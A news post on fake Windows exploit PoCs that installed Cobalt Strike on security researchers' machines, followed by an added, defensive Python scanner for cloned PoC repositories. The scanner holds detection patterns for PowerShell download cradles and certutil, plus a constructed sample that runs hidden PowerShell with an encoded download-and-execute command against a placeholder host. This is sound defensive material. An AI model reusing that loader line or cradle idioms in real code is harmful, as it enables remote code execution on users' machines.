Hackers Target Windows Security Experts With Fake Exploits
upstart writes:
Instead of getting an exploit PoC, they're getting something a lot more sinister:
It's common practice for researchers to publish a PoC [Proof-of-Concept] of recently patched flaws on code repositories, such as GitHub. That way, they can test different solutions among themselves and force admins to apply the fixes as soon as possible.
When Microsoft patched two remote code execution vulnerabilities, tracked as CVE-2022-24500 and CVE-2022-26809, a few PoCs popped up on GitHub, one of them coming from an account named "rkxxz".
However, the PoC turned out to be bogus, and what it did instead was install Cobalt Strike beacons on the researchers' endpoints. [...]
Fake Windows exploits target infosec community with Cobalt Strike:
This is not the first time threat actors have targeted vulnerability researchers and pentesters.
In January 2021, the North Korean Lazarus hacking group targeted vulnerability researchers through social media accounts and zero-day browser vulnerabilities.
In March 2021, North Korean hackers again targeted the infosec community by creating a fake cybersecurity company called SecuriElite (located in Turkey).
In November, the Lazarus hacking group conducted another campaign using a trojanized version of the IDA Pro reverse engineering application that installed the NukeSped remote access trojan.
By targeting the infosec community, threat actors not only gain access to vulnerability research the victim may be working on but may also potentially gain access to a cybersecurity company's network.
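A defender's counterpart to the story above, added here as an example and not code from the post or from the articles it quotes: a static screen to run over a cloned PoC repository before anyone executes it. The indicators it looks for (an encoded PowerShell argument, a download cradle, a large base64 blob that decodes to script text or to an MZ header, a precompiled binary in what is supposed to be a source-only repo) are generic assumptions chosen for illustration; the post does not say how the rkxxz code delivered its beacon. The sample files, the `build_sample_repo` helper and the `placeholder.invalid` URL are constructed for the demo.

```python
"""Static screening of a downloaded proof-of-concept before anyone executes it.

Added example, not code from the news post or from any article it quotes.
The indicators below are generic signs that a "PoC" carries a hidden
download-and-execute stage; they are assumptions for illustration and do not
describe the rkxxz repository, whose contents the post does not detail.
"""
import base64
import re
import tempfile
from pathlib import Path
from typing import Optional

# Textual indicators of a hidden loader stage (assumed heuristics).
SUSPICIOUS_PATTERNS = {
    # powershell -enc / -EncodedCommand followed by a long base64 argument
    "powershell_encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\b[\s\"',]*[A-Za-z0-9+/=]{40,}", re.I),
    # classic download cradles and in-memory execution verbs
    "powershell_download_cradle": re.compile(
        r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|IEX|Invoke-Expression)\b", re.I),
    "certutil_urlcache": re.compile(r"certutil(?:\.exe)?\s+-urlcache", re.I),
    # script idiom: decode an embedded blob and hand it straight to exec/eval
    "decode_then_exec": re.compile(r"(?:exec|eval)\s*\(.*b64decode", re.I),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
BINARY_SUFFIXES = {".exe", ".dll", ".scr", ".bin"}
MAX_DECODE_DEPTH = 2


def _blob_to_text(raw: bytes) -> Optional[str]:
    """Return the blob as text if it decodes cleanly as UTF-16LE (PowerShell -enc) or UTF-8."""
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return None


def scan_text(name: str, text: str, depth: int = 0) -> list[str]:
    """Return indicator labels found in one file's text, recursing into decodable blobs."""
    findings = [f"{name}: {label}" for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
    if depth >= MAX_DECODE_DEPTH:
        return findings
    for blob in BASE64_BLOB.findall(text):
        core = blob.rstrip("=")
        try:
            raw = base64.b64decode(core + "=" * (-len(core) % 4))
        except ValueError:
            continue
        if raw[:2] == b"MZ":  # DOS/PE header: an executable smuggled as text
            findings.append(f"{name}: embedded_pe_in_base64 ({len(blob)} chars)")
            continue
        findings.append(f"{name}: large_base64_blob ({len(blob)} chars)")
        inner = _blob_to_text(raw)
        if inner:  # the blob is itself script text: rescan what it hides
            findings.extend(scan_text(f"{name}[decoded]", inner, depth + 1))
    return findings


def scan_directory(root: Path) -> list[str]:
    """Screen every file under root; binaries in a 'source' PoC repo are flagged outright."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.suffix.lower() in BINARY_SUFFIXES:
            findings.append(f"{path.name}: precompiled_binary_in_source_repo")
            continue
        findings.extend(scan_text(path.name, path.read_text(errors="replace")))
    return findings


# --- constructed sample repository (no real payload; the URL is a placeholder) ---
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
FAKE_POC = (
    '# "PoC" that never touches the advertised bug (constructed sample)\n'
    "import subprocess\n"
    f'subprocess.run(["powershell", "-nop", "-w", "hidden", "-enc", "{ENCODED}"])\n'
)
CLEAN_HELPER = (
    "# Harmless connectivity check (constructed sample)\n"
    "import socket\n\n"
    "def probe(host, port):\n"
    "    return socket.create_connection((host, port), timeout=2)\n"
)


def build_sample_repo(root: Path) -> None:
    """Write the constructed sample files into root."""
    (root / "exploit.py").write_text(FAKE_POC)
    (root / "helper.py").write_text(CLEAN_HELPER)
    (root / "payload.bin").write_bytes(b"MZ" + b"\x00" * 64)
    # base64 text that decodes to an MZ header, the 'binary hidden in a text file' case
    (root / "stage.dat").write_text(base64.b64encode(b"MZ" + b"\x00" * 150).decode())


def demo_findings() -> list[str]:
    """Build the sample repo in a temp dir and return everything the screen flags."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_repo(root)
        return scan_directory(root)


if __name__ == "__main__":
    for finding in demo_findings():
        print(finding)
```

The useful part of the output is the `exploit.py[decoded]` line: the raw file shows nothing but an opaque `-enc` argument, and only decoding the blob and rescanning it exposes the download cradle. A clean result is triage, not a verdict; the screen finds common loader idioms, so a PoC that passes still belongs in an isolated, disposable machine with network monitoring, never on the workstation holding your own research.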
Read more of this story at SoylentNews.